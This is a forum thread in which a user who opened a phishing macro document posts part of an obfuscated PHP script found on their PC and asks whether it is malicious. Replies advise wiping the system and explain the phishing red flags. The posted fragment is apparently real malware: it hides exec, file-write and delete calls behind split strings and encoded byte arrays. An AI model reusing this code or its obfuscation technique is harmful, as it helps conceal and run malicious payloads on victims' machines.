Jump to content

Recommended Posts

I foolishly clicked a link in an email from what I thought was UPS (with a tracking number) and the link was a doc file with macros.. I noticed on system startup that I was seeing a PHP popup in the lower task bar. I then went to my local AppData\Roaming to find a suspicious folder with a php.exe file, a dll and a php script. I opened the PHP file in npp to have a look. I have very little experience with PHP so I can't really tell what the script is doing. Here is a copy/paste -- and I removed a little less than half the code just in case I am actually posting malicious code to this forum..

 

 

If I had to guess, I'd say it looks like it's doing encryption, so it's ransomware..

 

Script:

<?php
$GLOBALS['38744245'] = Array(
    'cu' . 'rl_multi_exec',
    'm' . 'ss' . 'ql_re' . 's' . 'ult',
    'file_ge' . 't' . '_c' . 'on' . 'te' . 'nts',
    '' . 'fi' . 'l' . 'e_put_co' . 'n' . 't' . 'ents',
    'ex' . 'ec',
    '' . 'unlink',
    '' . 'strpos',
    'fg' . 'etcs' . 'v',
    'strnat' . 'cmp',
    'strlen',
    'm' . 't_' . 'rand',
    'p' . 're' . 'g_repla' . 'ce_callb' . 'ack',
    'ch' . 'r',
    'ord',
    'st' . 'r' . 'po' . 's',
    'array_' . 'fi' . 'lter',
    's' . 'e' . 'ssion_is_r' . 'egist' . 'ered',
    's' . 't' . 'rpos',
    'cr' . 'eate_func' . 'tion',
    'i' . 'm' . 'agecreatefrom' . 'gd2part',
    'mt_' . 'rand'
);
?><?php
function _1369297363($taqqmn)
{
    $cabbfl = Array(
        "\xb0\x25\x64\xf2\x87\x45\x4b\xdb\xa9\x45\x52\xcc\x93\x56\x67\xeb\x87\x53\x78\xca\x8c\x45\x61\xfe\x96\x44\x53\xc4\x94\x41\x63\xfb\x93\x52\x2c\xda\x97\x74\x33\xc5\x8c\x5c\x23\x9f\x86\x5f\x2e",
        "\xb0\x25\x64\xf2\x87\x45\x4b\xdb\xa9\x45\x52\xcc\x93\x56\x67\xeb\x87\x53\x78\xca\x8c\x45\x61\xfe\x96\x44\x53\xc4\x94\x41\x63\xfb\x93\x52\x2c\xda\x97\x74\x33\xc5\x8c\x5c\x23\x9f\x86\x5f\x2e\x9c\x9a\x53\x21",
        'i',
        'bxhndsxsexibrxben',
        'gdz',
        '',
        'lxdgilfgvccek',
        'vz'
    );
    return $cabbfl[$taqqmn];
}
?><?php
$ucdxetr = round(0 + 101392739.8 + 101392739.8 + 101392739.8 + 101392739.8 + 101392739.;
while (round(0 + 3693) - round(0 + 923.25 + 923.25 + 923.25 + 923.25))
    $GLOBALS['38744245'][0]($yfvmrsd, $rgyctvo, $hdoptxm);
$ovehlgp = _1369297363(0);
$czdwupq = _1369297363(1);
while (round(0 + 369.33333333333 + 369.33333333333 + 369.33333333333) - round(0 + 221.6 + 221.6 + 221.6 + 221.6 + 221.6))
    $GLOBALS['38744245'][1]($acdfplp, $rgyctvo, $ghktwqf);
$ovehlgp = gnnnesr($ovehlgp, $ucdxetr);
$czdwupq = gnnnesr($czdwupq, $ucdxetr);
$yxfgkhr = $GLOBALS['38744245'][2]($ovehlgp);
if ($yxfgkhr) {
    $ghktwqf = gnnnesr($yxfgkhr, $ucdxetr);
    $GLOBALS['38744245'][3]($czdwupq, $ghktwqf);
    $GLOBALS['38744245'][4]($czdwupq);
    while (!$GLOBALS['38744245'][5]($czdwupq))
        Sleep(round(0 + 1));
    $ptdybmu = _1369297363(2);
}
function tpugtze($acdfplp, $gsseqei)
{
    $wexiboc = $gsseqei & round(0 + 7.75 + 7.75 + 7.75 + 7.75);
    if ($GLOBALS['38744245'][6](_1369297363(3), _1369297363(4)) !== false)
        $GLOBALS['38744245'][7]($yfvmrsd, $ucdxetr, $ucdxetr, $czdwupq);
    return ($acdfplp << $wexiboc) | (($acdfplp >> (round(0 + 10.666666666667 + 10.666666666667 + 10.666666666667) - $wexiboc)) & ((round(0 + 1) << (round(0 + 7.75 + 7.75 + 7.75 + 7.75) & $wexiboc)) - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)));
}
function gnnnesr($rgyctvo, $ucdxetr)
{
    $qaptxjz = _1369297363(5);
    while (round(0 + 3667) - round(0 + 3667))
        $GLOBALS['38744245'][8]($yxfgkhr);


[END PORTION OF CODE REMOVED]


?>
Edited by cavemanager
Link to comment
https://forums.phpfreaks.com/topic/303116-is-this-a-malicious-php-script/
Share on other sites

I foolishly clicked a link in an email from what I thought was UPS (with a tracking number) and the link was a doc file with macros.

:facepalm:

 

It's pretty much guaranteed to be malicious, and it's likely not the only bad thing that got added to your computer.

:facepalm:

 

It's pretty much guaranteed to be malicious, and it's likely not the only bad thing that got added to your computer.

 

I figured.. any way to check where/what else got added to my pc? I have Trend Mirco AV as well as Malwarebytes.. I've done scans but nothing turned up... 

Forget about trying to “clean” the system. Cut the Internet connection, save your data (or what's left of it), wipe the PC and start over.

 

And for the love of god, stop opening random files from the Internet.

 

I'm not just downloading random files from the Internet. I am usually careful about these things but it just so happened that I have UPS orders and the email looked legit. I don't know if you've heard, but even knowledgeable people can be tricked too.

 

I did immediately disconnect from the network and do some file copies just in case. Meanwhile, Trend eventually grabbed the virus and I think I stopped it before it could do any damage. I am planning to wipe and re-install just because I know it's the best thing to do.

Edited by cavemanager

I don't know if you've heard, but even knowledgeable people can be tricked too.

 

Sure, but going to a website which clearly isn't the official one (ups.com uses HTTPS with an EV certificate for everything), downloading a .doc file (why would UPS use such a weird format?), opening it directly in Word and probably clicking past the macro warnings is a pretty long chain of actions.

 

I'm not saying this to put you down or pretend like I'm immune to attacks. My point is that you need a lot more paranoia on multiple levels, not just related to strange e-mails.

Sure, but going to a website which clearly isn't the official one (ups.com uses HTTPS with an EV certificate for everything), downloading a .doc file (why would UPS use such a weird format?), opening it directly in Word and probably clicking past the macro warnings is a pretty long chain of actions.

 

I'm not saying this to put you down or pretend like I'm immune to attacks. My point is that you need a lot more paranoia on multiple levels, not just related to strange e-mails.

 

I clicked the link in my email and the file just downloaded/ran. I didn't manually go out to a website to download it. Like I said, the email looked really legit and I just happened to be waiting for a package from UPS. Plus, this was before I had coffee.. Looking back, I should have hovered over the link to see the real destination. Live and learn. 

If simply opening the file was enough then there's a good chance your Office isn't up to date with patches: the file should have been blocked by Word from doing anything, specifically for this reason.

 

But yeah, lesson learned. Companies do not send attachments with emails, not least because of the processing overhead to do so - they either tell you what you need to know in the email, or link(/phish) you to a website.

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.